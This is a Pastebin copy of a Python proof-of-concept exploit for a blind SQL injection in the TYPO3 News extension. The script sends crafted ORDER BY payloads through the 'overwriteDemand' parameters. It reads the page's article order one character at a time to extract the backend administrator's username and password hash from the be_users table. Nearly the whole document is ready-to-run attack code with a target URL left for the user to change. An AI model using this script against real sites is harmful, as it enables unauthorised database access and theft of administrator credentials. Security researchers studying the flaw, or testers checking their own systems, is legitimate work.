Advertisement
Guest User

Untitled

a guest
Apr 27th, 2017
118
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.83 KB | None | 0 0
  1. # Exploit Title: TYPO3 News Module SQL Injection
  2. # Vendor Homepage: https://typo3.org/extensions/repository/view/news
  3. # Exploit Author: Charles FOL
  4. # Contact: https://twitter.com/ambionics
  5. # Website: https://www.ambionics.io/blog/typo3-news-module-sqli
  6.  
  7.  
  8. #!/usr/bin/python3
  9.  
  10. # TYPO3 News Module SQL Injection Exploit
  11. # https://www.ambionics.io/blog/typo3-news-module-sqli
  12. # cf
  13. #
  14. # The injection algorithm is not optimized, this is just meant to be a POC.
  15. #
  16.  
  17. import requests
  18. import string
  19.  
  20.    
  21. session = requests.Session()
  22. session.proxies = {'http': 'localhost:8080'}
  23.  
  24.  
  25. # Change this
  26. URL = 'http://vmweb/typo3/index.php?id=8&no_cache=1'
  27. PATTERN0 = 'Article #1'
  28. PATTERN1 = 'Article #2'
  29.  
  30. FULL_CHARSET = string.ascii_letters + string.digits + '$./'
  31.  
  32.  
  33. def blind(field, table, condition, charset):
  34.  
  35.     # We add 9 so that the result has two digits
  36.  
  37.     # If the length is superior to 100-9 it won't work
  38.  
  39.     size = blind_size(
  40.  
  41.         'length(%s)+9' % field, table, condition,
  42.  
  43.         2, string.digits
  44.  
  45.     )
  46.  
  47.     size = int(size) - 9
  48.  
  49.     data = blind_size(
  50.  
  51.         field, table, condition,
  52.  
  53.         size, charset
  54.  
  55.     )
  56.  
  57.     return data
  58.  
  59.  
  60. def select_position(field, table, condition, position, char):
  61.  
  62.     payload = 'select(%s)from(%s)where(%s)' % (
  63.  
  64.         field, table, condition
  65.  
  66.     )
  67.  
  68.     payload = 'ord(substring((%s)from(%d)for(1)))' % (payload, position)
  69.  
  70.     payload = 'uid*(case((%s)=%d)when(1)then(1)else(-1)end)' % (
  71.  
  72.         payload, ord(char)
  73.  
  74.     )
  75.  
  76.     return payload
  77.  
  78.  
  79. def blind_size(field, table, condition, size, charset):
  80.  
  81.     string = ''
  82.  
  83.     for position in range(size):
  84.  
  85.         for char in charset:
  86.  
  87.             payload = select_position(field, table, condition, position+1, char)
  88.  
  89.             if test(payload):
  90.  
  91.                 string += char
  92.  
  93.                 print(string)
  94.  
  95.                 break
  96.  
  97.         else:
  98.  
  99.             raise ValueError('Char was not found')
  100.  
  101.    
  102.  
  103.     return string
  104.  
  105.  
  106. def test(payload):
  107.  
  108.     response = session.post(
  109.  
  110.         URL,
  111.  
  112.         data=data(payload)
  113.  
  114.     )
  115.  
  116.     response = response.text
  117.  
  118.     return response.index(PATTERN0) < response.index(PATTERN1)
  119.  
  120. def data(payload):
  121.  
  122.     return {
  123.  
  124.         'tx_news_pi1[overwriteDemand][order]': payload,
  125.  
  126.         'tx_news_pi1[overwriteDemand][OrderByAllowed]': payload,
  127.  
  128.         'tx_news_pi1[search][subject]': '',
  129.  
  130.         'tx_news_pi1[search][minimumDate]': '2016-01-01',
  131.  
  132.         'tx_news_pi1[search][maximumDate]': '2016-12-31',
  133.  
  134.     }
  135.  
  136. # Exploit
  137.  
  138. print("USERNAME:", blind('username', 'be_users', 'uid=1', string.ascii_letters))
  139. print("PASSWORD:", blind('password', 'be_users', 'uid=1', FULL_CHARSET))
  140.  
  141. #  0day.today [2017-04-27]  #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement